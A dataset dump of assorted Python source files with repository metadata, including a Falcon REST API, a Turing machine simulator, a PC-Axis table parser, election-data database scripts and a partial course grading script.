__id__
int64 3.09k
19,722B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
256
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 3
values | repo_name
stringlengths 5
109
| repo_url
stringlengths 24
128
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 6.65k
581M
⌀ | star_events_count
int64 0
1.17k
| fork_events_count
int64 0
154
| gha_license_id
stringclasses 16
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
5.76M
⌀ | gha_stargazers_count
int32 0
407
⌀ | gha_forks_count
int32 0
119
⌀ | gha_open_issues_count
int32 0
640
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 2
classes | gha_disabled
bool 1
class | content
stringlengths 9
4.53M
| src_encoding
stringclasses 18
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | year
int64 1.97k
2.01k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
12,429,635,355,859 |
a6ecedb718dde082101d8d56f402386256f26774
|
47cd08356aa3b4793dd52cf658834e3ee3693976
|
/api/app.py
|
b29b597ac41dfdc3cc21950572bc9dad0cd34004
|
[] |
no_license
|
amitgandhinz/cloud_notifications
|
https://github.com/amitgandhinz/cloud_notifications
|
1ea3749c013ca1f1451519e9d0e51e23636e3e12
|
c1fdd1497d756bf7d97ad49cc2978f4b5913b39b
|
refs/heads/master
| 2021-01-25T10:22:06.626504 | 2013-08-31T18:26:25 | 2013-08-31T18:26:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import falcon
import requests
import json
import topics
import messages
import subscribers
# falcon.API instances are callable WSGI apps
app = api = falcon.API()
# Resources are represented by long-lived class instances
topicCollection = topics.TopicCollectionResource()
topicResource = topics.TopicResource()
messageCollection = messages.MessageCollectionResource()
subscriberCollection = subscribers.SubscriberCollectionResource()
subscriberResource = subscribers.SubscriberResource()
# subscriber actions
api.add_route('/v1/topics/{topic_name}/subscribers', subscriberCollection)
api.add_route('/v1/topics/{topic_name}/subscribers/{subscriber_name}', subscriberResource)
# publisher actions
api.add_route('/v1/topics', topicCollection)
api.add_route('/v1/topics/{topic_name}', topicResource)
api.add_route('/v1/topics/{topic_name}/messages', messageCollection)
|
UTF-8
|
Python
| false | false | 2,013 |
17,351,667,896,973 |
45530205cef1cc59dd35fc76098e9bcea89a6e2a
|
06ee26d8446037c9e51c6c3a6889be3726966b68
|
/cls1/eggs/src/lti/composites/pvknob/setup.py
|
f2e49016c937611ae14f7545595746350bd281a7
|
[] |
no_license
|
emayssat/epics-opis
|
https://github.com/emayssat/epics-opis
|
d1492a601a7bb8b3cb858897baeefc02900b28fa
|
a752c9cb955d01c7bb1d612f290c7ea3369a9d5c
|
refs/heads/master
| 2019-07-28T10:07:37.871453 | 2013-10-21T22:27:35 | 2013-10-21T22:27:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
VERSION = '0.1.0'
COMPOSITE_NAME = 'PvKnob_1'
WINDOW_TITLE = 'PvKnob v%s' % VERSION
ACTIONS, ACTIONS_, COMPOSITES, COMPOSITES_, CONTAINERS, CONTAINERS_, DIALOGS, DIALOGS_ = (1<<x for x in range(8))
DEBUG = ACTIONS | ACTIONS_ | COMPOSITES | COMPOSITES_ | CONTAINERS | CONTAINERS_
BACKGROUND_COLOR = 'green'
PRECISION = 3
HELP_INDEX_PAGE = "pvknobcomposite_index.html"
STYLESHEET = """
LPvKnobComposite { background-color: Grey }
"""
|
UTF-8
|
Python
| false | false | 2,013 |
7,361,573,958,410 |
b0d3b54cb8c6027031a9bbaca25530864e04554c
|
5a44fe1039cbc8858be71a75bfe08b83a29e8ea3
|
/populate_demo_info.py
|
f00df05553ed420189959a0e94ee3352537f0aae
|
[] |
no_license
|
Jhanani/Tv-Data-Mining-
|
https://github.com/Jhanani/Tv-Data-Mining-
|
edad8c4c25046f947b0a4c797a7e71f8e0c99c4d
|
92f565556bbc5de1911d5f9ca02720c2532e9eec
|
refs/heads/master
| 2021-03-27T20:14:35.775743 | 2014-10-14T19:26:59 | 2014-10-14T19:26:59 | 25,220,514 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import MySQLdb
import fwm_config as fwm_config
config = fwm_config.Config()
BULK_INSERT_MAX_COUNT = 1000
def mysqldb_bulk_insert(db, db_table_name, mysql_data):
query = """
INSERT INTO {0}
(household_id, household_size, num_adults, num_generations,\
hh_age_range, hh_head_marital_status, hh_head_race, children_present,\
num_children, children_age, children_age_range, hh_head_dwelling_type,\
home_owner_status, hh_head_residence_length, home_market_value, num_vehicles,\
vehicle_make_code, vehicle_model, vehicle_year, hh_net_worth,\
hh_income, hh_identify_gender, hh_identify_age, hh_identify_education,\
hh_identify_occupation, hh_head_education, hh_head_occupation, hh_2nd_age,\
hh_2nd_education, hh_2nd_occupation, hh_3rd_age, hh_3rd_education,\
hh_3rd_occupation, hh_4th_age, hh_4th_education, hh_4th_occupation,\
hh_5th_age, hh_5th_education, hh_5th_occupation, hh_head_political_party,\
hh_head_voter_party, personicx_cluster_code, personicx_insurance_code, personicx_financial_code)
VALUES
(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,\
%s, %s, %s, %s);
""".format(db_table_name)
db.bulk_insert_no_commit(query, mysql_data)
def populate_demo():
db_table_name = 'fwm_demo_04_2014'
db = fwm_config.Database()
demo_dir = '/files2/Temp/demodata/'
demo_file = '4Cinsights.rpt_demodata.20140113.pd'
mysql_bulk_data = list()
with open(demo_dir+demo_file) as f:
for line in f:
entry = line.strip('\n\t\r ').split('|')
entry = [item if len(item)!=0 else None for item in entry]
if entry[7]=='N':
entry[7]=False
elif entry[7]=='Y':
entry[7]=True
#print entry
mysql_bulk_data.append(entry)
if len(mysql_bulk_data) == BULK_INSERT_MAX_COUNT:
print 'Inserting into databse ', len(mysql_bulk_data), ' rows'
mysqldb_bulk_insert(db,db_table_name,mysql_bulk_data)
mysql_bulk_data = list()
db.explicit_commit()
#break
if len(mysql_bulk_data):
print 'Inserting into database ', len(mysql_bulk_data), ' rows'
mysqldb_bulk_insert(db,db_table_name,mysql_bulk_data)
db.explicit_commit()
if __name__ == '__main__':
populate_demo()
|
UTF-8
|
Python
| false | false | 2,014 |
9,964,324,155,485 |
35f67d56b8ba1049cddbc1754b499072bee53915
|
217ff8d9222701f55a4ff5576c09527655483b54
|
/src/commons/Parsers.py
|
044387387f4841e5ce03918617e27980f27e64d5
|
[] |
no_license
|
Wiceradon/SMPD_old
|
https://github.com/Wiceradon/SMPD_old
|
4fee9487c63b1ed4a874df37e58d565807223978
|
b6642fad27e761a1617e6e58c9beabe861c3d9e9
|
refs/heads/master
| 2020-08-04T12:32:45.649653 | 2014-07-22T23:56:43 | 2014-07-22T23:56:43 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on 04-04-2013
@author: jakub
'''
def parseIntOrNone(value):
if value in ("", None): return None
return int(value)
def parseFloatOrNone(value):
if value in ("", None): return None
return float(value)
def parseSimpleString(value):
if value == None: return ""
return str(value)
def parsePointToString(p, delim1, delim2):
return str(p.LABEL)+delim1+delim2.join([str(x) for x in p.FEATURES])
|
UTF-8
|
Python
| false | false | 2,014 |
3,204,045,620,245 |
4a8f344b611b201b2d14cc6df5177c6ca62580b4
|
bba021fdd82dae7eb5e5a4383fad244851282945
|
/machine.py
|
4c1a3442418b816363c8e82fbc5096b3fda2c488
|
[] |
no_license
|
cottyard/TuringMachineSimulator
|
https://github.com/cottyard/TuringMachineSimulator
|
3ed16d171a15b4ed566d644fc7df08c7116ec401
|
dc8090572993121dea4aa35a7410a884d47e95c1
|
refs/heads/master
| 2016-09-09T23:27:25.791052 | 2014-04-23T14:59:26 | 2014-04-23T14:59:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from abc import ABCMeta, abstractmethod
class ExtensibleList:
def __init__(self, default_value):
self.list = []
self.default_value = default_value
def __getitem__(self, index):
try:
return self.list[index]
except IndexError:
return self.default_value
def __setitem__(self, index, value):
try:
self.list[index] = value
except IndexError:
if index < 0:
raise NotSupportedIndex
to_add = index + 1 - len(self.list)
self.list.extend([self.default_value] * to_add)
self.list[index] = value
def __iter__(self):
return iter(self.list)
class Tape:
figures = ('1', '0')
def __init__(self):
self._tape = ExtensibleList(' ')
self._figure_count = 0
def show_all(self):
print ''.join(self._tape).rstrip()
def show_output(self):
print ''.join(filter(lambda s: s in Tape.figures, self._tape))
def write(self, square, symbol):
self._tape[square] = symbol
if symbol in Tape.figures:
self._figure_count += 1
def erase(self, square):
if self._tape[square] in Tape.figures:
self._figure_count -= 1
self._tape[square] = ' '
def read(self, square):
return self._tape[square]
def figure_count(self):
return self._figure_count
class TuringMachine:
__metaclass__ = ABCMeta
@abstractmethod
def r(self):
pass
@abstractmethod
def l(self):
pass
@abstractmethod
def p(self, symbol):
pass
@abstractmethod
def e(self):
pass
class Machine(TuringMachine):
def __init__(self):
self.tape = None
self.position = None
self.config = None
self.state = None
def install_tape(self, tape, position):
self.tape = tape
self.position = position
def install_configuration(self, config, begin_state):
self.config = config
self.state = begin_state
def r(self):
self.position += 1
def l(self):
if self.position <= 0:
raise InvalidMachineOperation('trying moving off the tape head')
self.position -= 1
def p(self, symbol):
self.tape.write(self.position, symbol)
def e(self):
self.tape.erase(self.position)
def show_position(self):
print ' ' * self.position + '^'
def scanned_symbol(self):
return self.tape.read(self.position)
def show_mconfig(self):
if self.config is not None:
print 'state:', self.state
def move_to_next_state(self):
self.state = self.config.move(
self.state,
self.scanned_symbol(),
self
)
def run(self, output_length=None):
if output_length is None:
self.move_to_next_state()
else:
while self.tape.figure_count() < output_length:
self.move_to_next_state()
class InvalidMachineOperation(Exception):
pass
class NotSupportedIndex(Exception):
pass
|
UTF-8
|
Python
| false | false | 2,014 |
9,938,554,338,129 |
1bbc43f162dda00d62004a7cad7a3b1bb5ea7506
|
977da707534806edad2f85e5b4c75b73da1a23b3
|
/problem14.py
|
9a70fd8878dd7f6daede67a841d70bf278c44ade
|
[] |
no_license
|
rfolk/Project-Euler
|
https://github.com/rfolk/Project-Euler
|
fdb11e1f775441e9ff6adb344abc505ffff351ff
|
a8f9ca8541b9110c44eb85cf0e9f28a7d635b1eb
|
refs/heads/master
| 2016-09-10T19:00:29.734691 | 2013-07-10T20:55:39 | 2013-07-10T20:55:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Russell Folk
# July 9, 2013
# Project Euler #14
# The following iterative sequence is defined for the set of positive integers:
#
# n → n/2 (n is even)
# n → 3n + 1 (n is odd)
#
# Using the rule above and starting with 13, we generate the following
# sequence:
# 13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1
# It can be seen that this sequence (starting at 13 and finishing at 1)
# contains 10 terms. Although it has not been proved yet (Collatz Problem), it
# is thought that all starting numbers finish at 1.
# Which starting number, under one million, produces the longest chain?
import time
chains = []
ceiling = 1000001
head = -1
length = -1
def nextChain ( n ) :
if n == 1 :
return 1
if n < 3 * ceiling and chains [ n ] != 0 :
return chains [ n ] + 1
current = -1
if n % 2 == 0 :
current = nextChain ( int ( n / 2 ) )
else :
current = nextChain ( 3 * n + 1 )
if n < 3 * ceiling :
chains [ n ] = current + 1
return chains [ n ]
else :
return current + 1
start = time.perf_counter()
# This will initialize found chains from any location to 0
for i in range ( 3 * ceiling ) :
chains.append ( 0 )
chains [ 1 ] = 1
for i in range ( 2 , ceiling , 1 ) :
thisHead = i
thisLength = nextChain ( i )
#if chains [ thisHead ] == 0 :
# chains [ thisHead ] == thisLength
if thisLength > length :
length = thisLength
head = thisHead
#print ( "Working on: " + str ( i ) )
elapsed = ( time.perf_counter() - start )
print ( "The starting number that produces the longest chain is " +
str ( head ) + " with a chain of " + str ( length ) )
print ( "Calculated in: " + str ( elapsed ) + " seconds." )
|
UTF-8
|
Python
| false | false | 2,013 |
3,582,002,766,940 |
bdb60e7854d092fc8c754c5cd16ee0a587cc405e
|
4f74f7ed0c5d7daa80c5c60f57c4753f87c0cbd9
|
/pyRserve/__init__.py
|
2607529688be59ca29628d38b0f247ebb7e529bc
|
[
"MIT"
] |
permissive
|
aidan/pyrserv
|
https://github.com/aidan/pyrserv
|
1f25e074a782f621bf0cc86a01f3dd4a29362430
|
b8304c41357977d081fbdc2ad88a5b77d52802dc
|
refs/heads/master
| 2021-01-01T05:41:32.880192 | 2012-06-20T14:46:15 | 2012-06-20T14:46:15 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import warnings
# Show all deprecated warning only once:
warnings.filterwarnings('once', category=DeprecationWarning)
del warnings
from rconn import rconnect, connect
from taggedContainers import TaggedList
__version__ = '0.5.2'
|
UTF-8
|
Python
| false | false | 2,012 |
4,363,686,796,544 |
43b485e32c27916308393eb0ac9b20835d0e1291
|
7a079c7cae330a0bca46fbd5c97b1ea242d8bb02
|
/pypcaxis.py
|
74a43c4ca715bf5d0d9a7af8a318d96086626ab4
|
[] |
no_license
|
vehrka/pypcaxis
|
https://github.com/vehrka/pypcaxis
|
b5e93bad09f2a8fe89c0880804ceca22369ad917
|
3cb1fe1faf341de61d06f5ed2e3772a2d5adf85f
|
refs/heads/master
| 2021-01-17T21:43:26.781359 | 2014-05-15T11:23:08 | 2014-05-15T11:23:08 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
from itertools import product
from operator import mul
from pandas import DataFrame
class Dimension(object):
def __init__(self, title, values):
self.title = title
self.values = values
def __len__(self):
return len(self.values)
class Table(object):
def __init__(self):
self.dimensions = []
self.data = None
def add_dimension(self, dimension):
self.dimensions.append(dimension)
def get_by(self, title, value):
#FIXME does not work!!!
title_index = [dim.title for dim in self.dimensions].index(title)
dims = [dim.values for dim in self.dimensions]
dims[title_index] = [value]
table = Table()
table.dimension = [d for d in self.dimensions if d.title != title]
table.data = [self.get(*criteria) for criteria in reversed(list(product(*dims)))]
return table
def get(self, *criteria):
dim_lenghts = [len(dim) for dim in self.dimensions]
dim_indices = [dim.values.index(c) for (dim, c)
in zip(self.dimensions, criteria)]
return self.data[sum(reduce(mul, dim_lenghts[i+1:], 1) * index
for i, index in enumerate(dim_indices))]
def parse(path):
data = read_data(path)
value_regex = re.compile(r'VALUES\(\"(.*)\"\)')
table = Table()
for item in data:
if not item:
continue
name, values = [t.strip() for t in item.split('=', 1)]
value_match = value_regex.match(name)
if value_match:
title = value_match.group(1)
table.add_dimension(create_dimension(title, values))
if name == 'DATA':
table.data = [i.strip() for i in values.split(' ')]
return table
def read_data(path):
return [t.strip() for t in
open(path).read().decode('IBM850').replace(';\r\n', ';\n').split(';\n')]
def create_dimension(title, values):
# values are defined like: "foo","bar","zap"
values = values.replace('\r\n', '').replace('\n', '')[1:-1].split('","')
return Dimension(title, values)
def to_pandas_df(table):
"""Creates a Pandas DataFrame with the data in the table"""
largs = table.dimensions
total = 1
ldims = []
for dim in largs:
ldims.append(len(dim))
total *= len(dim)
vresult = total * [0]
for i, dim in enumerate(largs):
ldim = ldims[i]
tblo = total / ldim
if i < (len(ldims) - 1):
rdim = 1
for x in range(i, len(ldims) - 1):
rdim *= ldims[x+1]
else:
rdim = 1
for udi in range(ldim):
if i == 0:
for j in range(rdim):
vresult[j+(udi * rdim)]=[dim.values[udi]]
else:
for j in range(0, total, ldim * rdim):
for k in range(rdim):
vresult[j + k + (udi * rdim)].extend([dim.values[udi]])
for i, fila in enumerate(vresult):
fila.extend([table.data[i]])
colnames = [dim.title for dim in table.dimensions]
colnames.extend(['values'])
return DataFrame(vresult, columns=colnames)
if __name__ == '__main__':
table = parse('examples/tulot.px')
print table.get('2008', 'Tuusula - Tusby', 'Veronalaiset tulot, mediaani')
print table.get('2009', 'Tuusula - Tusby', 'Veronalaiset tulot, mediaani')
print table.get('2007', u'Hyvink\xe4\xe4 - Hyvinge', 'Tulonsaajia')
print table.get_by('Vuosi', '2007').get(u'Hyvink\xe4\xe4 - Hyvinge', 'Tulonsaajia')
print table.get('2008', 'Tuusula - Tusby', 'Veronalaiset tulot, mediaani')
table = parse('examples/vaalit.px')
print table.get('Uudenmaan vaalipiiri', 'VIHR', u'Yhteens\xe4', u'78 vuotta')
|
UTF-8
|
Python
| false | false | 2,014 |
13,666,585,949,729 |
1be50da42a423c3f82f2827c3a1483acdf196ce0
|
8b194dc456edc27a69f0d47dbd889ce85c67937a
|
/webbrowser test.py
|
c0c40ad4f57f425453f0949af5fbf2d7ae23d524
|
[
"GPL-2.0-only"
] |
non_permissive
|
jluellen/sms_ip
|
https://github.com/jluellen/sms_ip
|
b7417958ce9b51d3c4e0c029f6bc7237cdaa520d
|
c3a1505de1f59323ad71b87d0d6ea58144e45fe0
|
refs/heads/master
| 2021-05-24T05:35:35.916091 | 2014-01-22T17:01:53 | 2014-01-22T17:01:53 | 15,212,098 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import mechanize
import re
br = mechanize.Browser()
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Want debugging messages?
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
# User-Agent (this is cheating, ok?)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
html = br.open('http://www.whatismyip.com/')
html = html.read()
html = unicode(html, errors='ignore')
match = re.search('<div class="the-ip">(.*)</div>', html)
if match:
chars = re.findall('\&\#(\d*)', match.group(1))
ip = ''.join([chr(int(char)) for char in chars])
print ip
|
UTF-8
|
Python
| false | false | 2,014 |
16,810,502,002,361 |
d09d8faf5aeb0fabcf8fe7e4be81afe93ce7be69
|
0bd1542bdece22dfd1a51d67e5eb51597f820fb8
|
/docs/test.py
|
a8e447b4adc1ba1b4b4a149963c395949e44e58c
|
[
"MIT"
] |
permissive
|
jMyles/WHAT
|
https://github.com/jMyles/WHAT
|
4d04119d65d317eb84c00682cb32bea2ed1bc11f
|
69e78d01065142446234e77ea7c8c31e3482af29
|
refs/heads/master
| 2021-01-18T02:18:20.911401 | 2014-10-03T00:39:24 | 2014-10-03T00:39:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import sys, os
from path import path
print path(__file__).dirname()
|
UTF-8
|
Python
| false | false | 2,014 |
8,040,178,825,472 |
e1c07e2617ad0b7657eb7745e158466c993f3478
|
6f639f7ae80d3f08729cb415eb6ef549b7982fa4
|
/homework5/create_db.py
|
dfac1e8fec9a0541d645098be2d6db6ff4058172
|
[] |
no_license
|
kuleana/ay250_pyseminar
|
https://github.com/kuleana/ay250_pyseminar
|
6be0654e5b51a2ff2f58fcce3103300ccde8b033
|
7b13a6d23e74f15278502dd027bdd8c2bb977b5c
|
refs/heads/master
| 2020-12-24T13:20:48.693484 | 2012-04-09T04:30:13 | 2012-04-09T04:30:13 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Katherine de Kleer
# 4/6/12
# AY250 homework#8
# modified from AY250 homework#5
import sqlite3
import urllib2
from bs4 import BeautifulSoup
import csv
import os
import datetime
import time
import matplotlib.pyplot as plt
import numpy as np
""" create_db: uses election data from intrade.com in .csv format to create a database of election probabilities for 2012 Presidential Election and Republican Presidential and Vice-Presidential Nomination."""
# create table "races"
connection = sqlite3.connect("races.db")
cursor = connection.cursor()
sql_cmd = """CREATE TABLE races (rid INTEGER PRIMARY KEY AUTOINCREMENT,
race_name TEXT, election_date DATE, data_url HYPERLINK)"""
cursor.execute(sql_cmd)
# populate table "races"
election_data = [
("2012 Republican Presidential Nomination", "8/30/12", "http://www.intrade.com/v4/markets/?eventId=84328"),
("2012 Presidential Election", "12/17/12", "http://www.intrade.com/v4/markets/?eventId=84326"),
("2012 Republican Vice-Presidential Nomination", "8/30/12", "http://www.intrade.com/v4/markets/?eventId=90482")]
for race in election_data:
sql_cmd = ("INSERT INTO races (race_name, election_date, data_url) VALUES " + str(race))
cursor.execute(sql_cmd)
# parse titles of csv files to get candidate names
dir='race_prediction_data/'
subdir=os.listdir(dir)
for item in subdir:
if item[0]=='.':
subdir.remove(item)
candidates = [item.split('_') for item in subdir]
candidates = [[entry[1],entry[0],entry[-1]] for entry in candidates] # creates list [lastname,firstname,race]
candidates.sort()
# create lists of candidates for each race
RepNom = []
RepVPNom = []
PresElect = []
allcand = []
for entry in candidates:
if ([entry[0],entry[1]]) not in allcand:
allcand.append([entry[0],entry[1]])
if entry[2]=='RepNom.csv':
RepNom.append([entry[0],entry[1]])
if entry[2]=='RepVPNom.csv':
RepVPNom.append([entry[0],entry[1]])
if entry[2]=='PresElect.csv':
PresElect.append([entry[0],entry[1]])
# create table "predictions"
connection3 = sqlite3.connect("predictions.db")
cursor3 = connection3.cursor()
sql_cmd = """CREATE TABLE predictions (pid INTEGER PRIMARY KEY AUTOINCREMENT,
date DATE, price FLOAT, volume INTEGER, name TEXT, rid INTEGER)"""
cursor3.execute(sql_cmd)
print '%CREATE_DB: reading .csv datafiles'
# read data from .csv files from intrade.com
for csvfile in subdir:
spamReader = csv.reader(open('race_prediction_data/'+csvfile, 'rb'))
first=csvfile.split('/')[-1].split('.csv')[-2].split('_')[0]
last=csvfile.split('/')[-1].split('.csv')[-2].split('_')[1]
race=csvfile.split('/')[-1].split('.csv')[-2].split('_')[-1]
cand=[last,first]
races=['RepNom','PresElect','RepVPNom']
rid = races.index(race)+1
name = cand[1]+' '+cand[0]
firstrow=True
for row in spamReader:
if firstrow==False:
date = row[0]
price = row[-2]
volume = row[-1]
entry=[date,price,volume,name,rid]
# populate "predictions" table
sql_cmd=("INSERT INTO predictions (date, price, volume, name, rid) VALUES " + str(tuple(entry)))
cursor3.execute(sql_cmd)
else:
firstrow=False
connection.commit()
cursor.close()
connection3.commit()
cursor3.close()
|
UTF-8
|
Python
| false | false | 2,012 |
7,945,689,547,481 |
d45e75f1865d0e83e500c084bc65373352e0b5aa
|
7508aa824d6f295619dfff050b05faf11aebe49c
|
/digerms/statistics.py
|
d0a852b27cba50e900e12e3effed1bacebba3dac
|
[] |
no_license
|
naymen/MELA
|
https://github.com/naymen/MELA
|
e5e97e2deb109c6ce04d5b39df2b35078d88e5d1
|
4d1fccdf50d822c7b70e60fb51e5279b785b97fa
|
refs/heads/master
| 2020-12-11T09:08:28.689411 | 2013-10-15T14:18:39 | 2013-10-15T14:18:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import numpy as np
import pandas as pd
class Statistics(pd.DataFrame):
_stats_fields = (
('birth_health_mean', np.float),
('birth_health_amin', np.float),
('birth_health_amax', np.float),
('herbivore_sum', np.float),
('total_eaten_mean', np.float),
('total_eaten_sum', np.float),
('age_median', np.float),
('age_mean', np.float),
('age_amax', np.float),
('gencount_amin', np.uint64),
('gencount_amax', np.uint64),
('gencount_mean', np.uint64),
('health_sum', np.float),
('health_mean', np.float),
('fitness_max', np.float),
('fitness_mean', np.float),
('step', np.uint64),
('born', np.uint16),
('random', np.uint16),
('deaths', np.uint16),
('attacking_sum', np.uint16),
('attacked_ok_sum', np.uint16),
('eating_sum', np.uint16),
('ready_to_born', np.uint16),
('primary_color_histogram_0', np.uint16),
('primary_color_histogram_1', np.uint16),
('primary_color_histogram_2', np.uint16),
('primary_color_histogram_3', np.uint16),
('primary_color_histogram_4', np.uint16),
('primary_color_histogram_5', np.uint16),
('primary_color_histogram_6', np.uint16),
('primary_color_histogram_7', np.uint16),
)
@classmethod
def for_shape(self, shape):
dtype = [(n,t) for n, t in self._stats_fields]
data = np.recarray(shape, dtype=dtype)
data[:] = 0
stats = Statistics(data=data)
stats._pointer = 0
return stats
#def __init__(self, *args, **kwargs):
# self._pointer = 0
# super(Statistics, self).__init__(*args, **kwargs)
def _get_current(self):
return self.ix[self._pointer]
def history(self):
# TODO все равно есть копирование, может тогда лучше добавлять в конец и стирать начало?
history = self.ix[self._pointer+1:]
history = history.append(self.ix[0:self._pointer+1])
return history
def _set_current(self, values):
if not isinstance(values, pd.Series):
values = pd.Series(values)
self.ix[self._pointer] = values
current = property(_get_current, _set_current)
def advance_frame(self):
self._pointer = (self._pointer + 1) % self.shape[0]
self.current = 0
def log(self, **data):
self.current = data
# print self.current
|
UTF-8
|
Python
| false | false | 2,013 |
11,020,886,089,993 |
053f6bcc55bc143eb96ba19e562d2daec5354602
|
e476f9ac2aef7a2e0f84f0d7a7b1c9fee53e052e
|
/ceilometer/compute/nova_notifier.py
|
0cd6edd8823ca886cbf366e34c9ffc6f58d29771
|
[] |
no_license
|
jcru/ceilometer
|
https://github.com/jcru/ceilometer
|
ac9cda2a131a7507b1a2bb888452b8bd1cbb6bde
|
40376ef9199034e9078333565863cff9f8228667
|
refs/heads/master
| 2020-12-25T00:06:29.674010 | 2012-09-26T13:04:20 | 2012-09-26T13:04:20 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2012 New Dream Network, LLC (DreamHost)
#
# Author: Julien Danjou <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from ceilometer.compute.manager import AgentManager
class CeilometerNovaNotifier(object):
"""Special notifier for Nova, doing special jobs for Ceilometer."""
def __init__(self):
self.manager = AgentManager()
self.manager.init_host()
def __call__(self, context, message):
if message['event_type'] == 'compute.instance.delete.start':
instance_id = message['payload']['instance_id']
self.manager.poll_instance(context,
db.instance_get(context,
instance_id))
notify = CeilometerNovaNotifier()
|
UTF-8
|
Python
| false | false | 2,012 |
3,539,053,097,795 |
1f617bb73fc429a87e05c2c851b97236c7d1c70e
|
94a2be4f4cf38269ee052fcef411e85d699b437d
|
/setup.py
|
444c2653de62983c48fea5dcb5e836a58ac23471
|
[
"MIT"
] |
permissive
|
pombredanne/spydey
|
https://github.com/pombredanne/spydey
|
c812641ca8e634cf9c2c6ec6ae557eb82d467b84
|
ee296a911a2196efe83de04deb6bcb325b2ce076
|
refs/heads/master
| 2021-01-17T08:33:23.253301 | 2010-12-15T21:49:09 | 2010-12-15T21:49:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from setuptools import setup, find_packages
import sys, os
version = '0.3'
README = open(os.path.join(os.path.dirname(__file__), 'README.txt')).read()
setup(name='spydey',
version=version,
description="A simple web spider with pluggable recursion strategies",
long_description=README,
classifiers=[
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Site Management :: Link Checking',
], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='Paul M. Winkler',
author_email='[email protected]',
url='http://github.com/slinkp/spydey',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
'httplib2',
'lxml',
],
entry_points="""
# -*- Entry points: -*-
[console_scripts]
spydey=spydey.spider:main
""",
)
|
UTF-8
|
Python
| false | false | 2,010 |
15,882,789,109,573 |
88140572a2f2af90cbcfea71b14d97dfa1294c94
|
edbfe6d4e8f9a93f6b64ad8b02b504f81bf1f33c
|
/assignment_6/assignment6.py
|
b95fbd8b1707be8890a87627d6da0d561b1621de
|
[] |
no_license
|
awickham/303E-grading-scripts
|
https://github.com/awickham/303E-grading-scripts
|
afcb13f203318cdbbf34e7dca06d451dde1d0f4d
|
4f40e5317ec829c3219e411d825829d8cd9783b8
|
refs/heads/master
| 2020-05-29T12:16:27.394080 | 2014-05-05T17:58:01 | 2014-05-05T17:58:01 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from os.path import os, exists
from datetime import datetime, timedelta
from functools import *
import subprocess
import sys
import re
import difflib
correct = open('correct.txt', 'r').read().split("\n")
correct = correct[0:-1]
outputFilename = 'assignment6.txt'
outputFile = open(outputFilename, 'w+')
outputFile.write('CSID\tGrade\tComments\n')
filename = "Hailstone.py"
dateString = "03-05-2014 23:00:00"
inputArray = open('input.txt','r').read().split("\n")
def main():
out = subprocess.getoutput('ls ./')
CSIDS = out.split("\n")
if len(sys.argv) == 3:
lowerBound = sys.argv[1]
upperBound = sys.argv[2]
myList = []
count = 0
for item in CSIDS :
if ord(item[0]) in range(ord(lowerBound), ord(upperBound)+1) :
if "." not in item :
myList.append( item )
for csid in myList :
count += 1
os.system('clear')
print('======================')
print(csid + " " + str(count) + " out of " + str(len(myList)))
print('======================')
assign6( csid , True)
#singleton mode
else:
csid = sys.argv[1]
